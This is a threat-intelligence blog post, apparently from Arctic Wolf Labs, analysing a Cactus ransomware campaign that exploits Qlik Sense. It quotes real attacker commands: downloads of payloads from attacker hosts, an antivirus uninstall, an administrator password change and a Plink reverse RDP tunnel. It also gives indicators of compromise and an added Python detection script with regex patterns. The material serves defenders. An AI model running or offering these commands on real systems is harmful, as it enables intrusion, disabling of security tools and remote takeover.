
This article aims to share timely and relevant information about a rapidly developing campaign under investigation. We are publishing it as early as possible for the benefit of the cybersecurity community and we will update this blog with more details as our investigation continues.
Key Takeaways
- Exploitation of Qlik Sense application in the observed campaign.
- Cactus ransomware deployed in association with observed exploitation.
- ManageEngine UEMS and AnyDesk deployed for remote access.
- Malicious activity was spawned by Qlik Sense Scheduler in each intrusion.
Summary
Arctic Wolf Labs has observed a new Cactus ransomware campaign which exploits publicly-exposed installations of Qlik Sense, a cloud analytics and business intelligence platform.[1] Based on available evidence, we assess that all vulnerabilities exploited were previously identified by researchers from Praetorian [2,3]. For more information on these vulnerabilities, see the advisories published by Qlik (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365) as well as our Security Bulletin.
This campaign marks the first documented instance Arctic Wolf is aware of where threat actors deploying Cactus ransomware have exploited vulnerabilities in Qlik Sense for initial access.
Intrusion Analysis
Arctic Wolf Labs is currently responding to several instances of Qlik Sense exploitation for initial access.
Analysis is still ongoing, but based on research from Praetorian [2,3] and the forensic evidence gathered so far, we currently assess that, depending on patch level, Qlik Sense is likely being exploited either through a combination or direct abuse of CVE-2023-41266 [5], CVE-2023-41265 [4] or potentially CVE-2023-48365 [6] to achieve code execution.
Following exploitation of Qlik Sense installations, the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes.
"CurrentDirectory":"C:\Program Files\Qlik\Sense\Scheduler\"
"ParentImage":"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe"
"CommandLine":"C:\Windows\System32\cmd.exe /c powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:\windows\temp\putty.exe"
Malicious activities involving Scheduler.exe
The threat actors leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control, including:
- Renamed ManageEngine UEMS [7] executables, with a ZIP extension masquerading as Qlik files. These files were renamed again after being downloaded and invoked for silent installation
- AnyDesk, downloaded directly from anydesk.com [8]
- A Plink (PuTTY Link) binary, downloaded and renamed to putty.exe [9]
powershell iwr -URI 'http://216.107.136.46/Qliksens_updated.zip' -OutFile 'C:\Windows\appcompat\AcRes.exe'
C:\Windows\appcompat\AcRes.exe /silent
powershell start-bitstransfer -source http://zohoservice.net/qlik-sens-nov.zip -outfile c:\windows\temp\Qliksens.exe
powershell Invoke-WebRequest https://download.anydesk.com/AnyDesk.exe -OutFile c:\windows\temp\file.exe
powershell wget 'http://zohoservice.net/anydesk.zip' -outfile 'c:\windows\temp\any.exe'
powershell iwr -uri http://zohoservice.net/putty.zip -OutFile c:\windows\temp\putty.exe
powershell Invoke-WebRequest https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe -OutFile C:\windows\temp\putty.exe
Multiple discovery commands were executed, and their output was redirected into .ttf files. We assume this was done so that the command output could be retrieved through the path traversal vulnerability, but this assumption has yet to be verified.
dir c:\windows\appcompat > ../Client/qmc/fonts/qle.ttf
powershell Get-WmiObject -Class Win32_Product > ../Client/qmc/fonts/qle.ttf
quser > ../Client/qmc/fonts/qle.ttf
dir c:\windwos\temp > ../Client/qmc/fonts/qle.ttf
The threat actor was further observed to:
- Use msiexec to uninstall Sophos via its GUID
- Change the administrator account password
- Establish an RDP tunnel via Plink
MsiExec.exe /X{5C28F8A0-4BCB-4267-A869-2D589DF264F1} /qn > ../Client/qmc/fonts/qle.ttf
net user administrator Linux.110.110@123 > ../Client/qmc/fonts/qle.ttf
echo y "^"| c:\windows\temp\putty.exe -ssh -P 443 -l admin -pw -R 45.61.147.176:50400:127.0.0.1:3389 45.61.147.176
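As an added defender-side example (not code from the original post or from Arctic Wolf), the following Python classifies process-creation events against the execution chain described above: Scheduler.exe as the parent process, the download primitives used to fetch the remote-access tooling, command output redirected into a .ttf file under the Qlik client folder, the msiexec uninstall and the administrator password change. The ParentImage and CommandLine field names follow the Sysmon-style record shown earlier; the sample events are constructed from the command lines in this post.

```python
import re
from typing import Dict, List

# Qlik Sense Scheduler service binary, the common parent in every intrusion described above.
SCHEDULER_SUFFIX = r"\qlik\sense\scheduler\scheduler.exe"
# Download primitives seen in the observed command lines.
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|wget|curl|start-bitstransfer)\b", re.I)
# Output redirected into a fake font file under the Qlik client folder (readback via traversal).
TTF_REDIRECT_RE = re.compile(r">\s*\S*client[/\\]qmc[/\\]fonts[/\\]\S+\.ttf", re.I)
MSI_UNINSTALL_RE = re.compile(r"\bmsiexec(\.exe)?\s+/x\s*\{", re.I)
ADMIN_PW_RE = re.compile(r"\bnet\s+user\s+administrator\s+\S+", re.I)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection labels that fire for one process-creation event."""
    labels: List[str] = []
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not parent.endswith(SCHEDULER_SUFFIX):
        return labels  # every rule below is conditional on the Scheduler parent
    labels.append("qlik_scheduler_child")
    if DOWNLOAD_RE.search(cmd):
        labels.append("download_from_scheduler")
    if TTF_REDIRECT_RE.search(cmd):
        labels.append("output_to_fake_ttf")
    if MSI_UNINSTALL_RE.search(cmd):
        labels.append("msi_uninstall_from_scheduler")
    if ADMIN_PW_RE.search(cmd):
        labels.append("admin_password_change")
    return labels


def scan(events):
    """Return (CommandLine, labels) for every event that raised at least one label."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]


# Constructed sample events modelled on the command lines in the article; not real telemetry.
QLIK_PARENT = r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe"
SAMPLE_EVENTS = [
    {"ParentImage": QLIK_PARENT, "CommandLine": r"C:\Windows\System32\cmd.exe /c powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:\windows\temp\putty.exe"},
    {"ParentImage": QLIK_PARENT, "CommandLine": r"cmd.exe /c quser > ../Client/qmc/fonts/qle.ttf"},
    {"ParentImage": QLIK_PARENT, "CommandLine": r"cmd.exe /c MsiExec.exe /X{5C28F8A0-4BCB-4267-A869-2D589DF264F1} /qn > ../Client/qmc/fonts/qle.ttf"},
    {"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"powershell iwr -uri https://example.invalid/tool.zip"},
]

if __name__ == "__main__":
    for cmd, labels in scan(SAMPLE_EVENTS):
        print(", ".join(labels), "<-", cmd)
```

The last sample event has the same download cmdlet but a non-Scheduler parent and is deliberately left unflagged, so the rules key on the parent process rather than on the cmdlet alone.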
Cactus Ransomware
In several instances, immediately following exploitation, Arctic Wolf detected malicious activities early in the kill chain and worked with customers to disrupt the progression of the attacks. We gained further insight into these activities during the investigation of a recent IR case which resulted in the deployment of Cactus ransomware.
Current evidence revealed that the threat actors:
- Used RDP for lateral movement
- Downloaded WizTree disk space analyzer [10]
- Leveraged rclone (renamed as svchost.exe) for data exfiltration
Based on the significant overlaps observed across all intrusions, we attribute all of the described attacks to the same threat actor, which was responsible for the deployment of Cactus ransomware.
As the incident response (IR) investigation is ongoing, we will provide further technical details once they become available.
Indicators of Compromise
Indicator | Type | Context
---|---|---
45.61.147[.]176 | IP Address | ManageEngine Server IP for zohoservice[.]net |
216.107.136[.]46 | IP Address | ManageEngine Server Hosting payload over HTTP |
144.172.122[.]30 | IP Address | ManageEngine Server Hosting payload over HTTP |
zohoservice[.]net | Domain Name | Hosting payload over HTTP |
http://zohoservice[.]net/putty.zip | URL | Renamed PuTTY Link (Plink) |
http://216.107.136[.]46/Qliksens_update.zip | URL | Renamed ManageEngine UEMS |
http://216.107.136[.]46/Qliksens_updated.zip | URL | Renamed ManageEngine UEMS |
http://zohoservice[.]net/qlik-sens-Patch.zip | URL | Renamed ManageEngine UEMS |
http://zohoservice[.]net/qlik-sens-nov.zip | URL | Renamed ManageEngine UEMS |
C:\Users\Public\svchost.exe | File path | Renamed Rclone
c:\windows\temp\file.exe | File path | Renamed AnyDesk
c:\windows\temp\putty.exe | File path | Renamed PuTTY Link (Plink)
c:\windows\temp\Qliksens.exe | File path | Renamed ManageEngine UEMS
c:\windows\temp\any.exe | File path | Renamed AnyDesk Installer
C:\temp\putty.exe | File path | Renamed PuTTY Link (Plink)
C:\Windows\appcompat\AcRes.exe | File path | Renamed ManageEngine UEMS
file.exe | Filename | Renamed AnyDesk Installer |
anydesk.zip | Filename | Renamed AnyDesk Installer |
AcRes.exe | Filename | Renamed ManageEngine UEMS |
any.exe | Filename | Renamed AnyDesk Installer |
putty.zip | Filename | ZIP containing PuTTY Link (Plink) |
Qlik_sense_enterprise.zip | Filename | Renamed ManageEngine UEMS |
qlik-sens-nov.zip | Filename | Renamed ManageEngine UEMS |
qlik-sens-Patch.zip | Filename | Renamed ManageEngine UEMS |
Qliksens.exe | Filename | Renamed ManageEngine UEMS |
Qliksens_updated.zip | Filename | Renamed ManageEngine UEMS |
Qliksens_update.zip | Filename | Renamed ManageEngine UEMS |
828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d | SHA256 | PuTTY Link (Plink) |
https://download.anydesk.com/AnyDesk.exe | URL | Official AnyDesk Installer |
90b009b15eb1b5bc4a990ecdd86375fa25eaa67a8515ae6c6b3b58815d46fa82 | SHA256 | ManageEngine UEMS Installer |
3ac8308a7378dfe047eacd393c861d32df34bb47535972eb0a35631ab964d14d | SHA256 | ManageEngine UEMS Installer |
6cb87cad36f56aefcefbe754605c00ac92e640857fd7ca5faab7b9542ef80c96 | SHA256 | ManageEngine UEMS Installer |
References
1. https://www.qlik.com/us/products/qlik-sense
2. https://www.praetorian.com/blog/qlik-sense-technical-exploit/
3. https://www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/
4. https://nvd.nist.gov/vuln/detail/CVE-2023-41265
5. https://nvd.nist.gov/vuln/detail/CVE-2023-41266
6. https://nvd.nist.gov/vuln/detail/CVE-2023-48365
7. https://www.manageengine.com/unified-endpoint-management-security.html
8. https://anydesk.com/
9. https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
10. https://diskanalyzer.com/
By Stefan Hostetler, Markus Neis, Kyle Pagelow
Stefan Hostetler | Senior Threat Intelligence Researcher
Stefan is a Senior Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.
Markus Neis | Principal Threat Intelligence Researcher
Markus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat research. He has more than a decade of experience in researching adversary tradecraft and responding to sophisticated attacks.
Kyle Pagelow | Principal Forensic Analyst
Kyle Pagelow is a Principal Forensic Analyst at Arctic Wolf Incident Response, focused on leading complex incident response and digital forensic investigations. He holds multiple certifications and has over 10 years of operational experience in incident response, defensive cyber operations, and threat intelligence.
Source: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/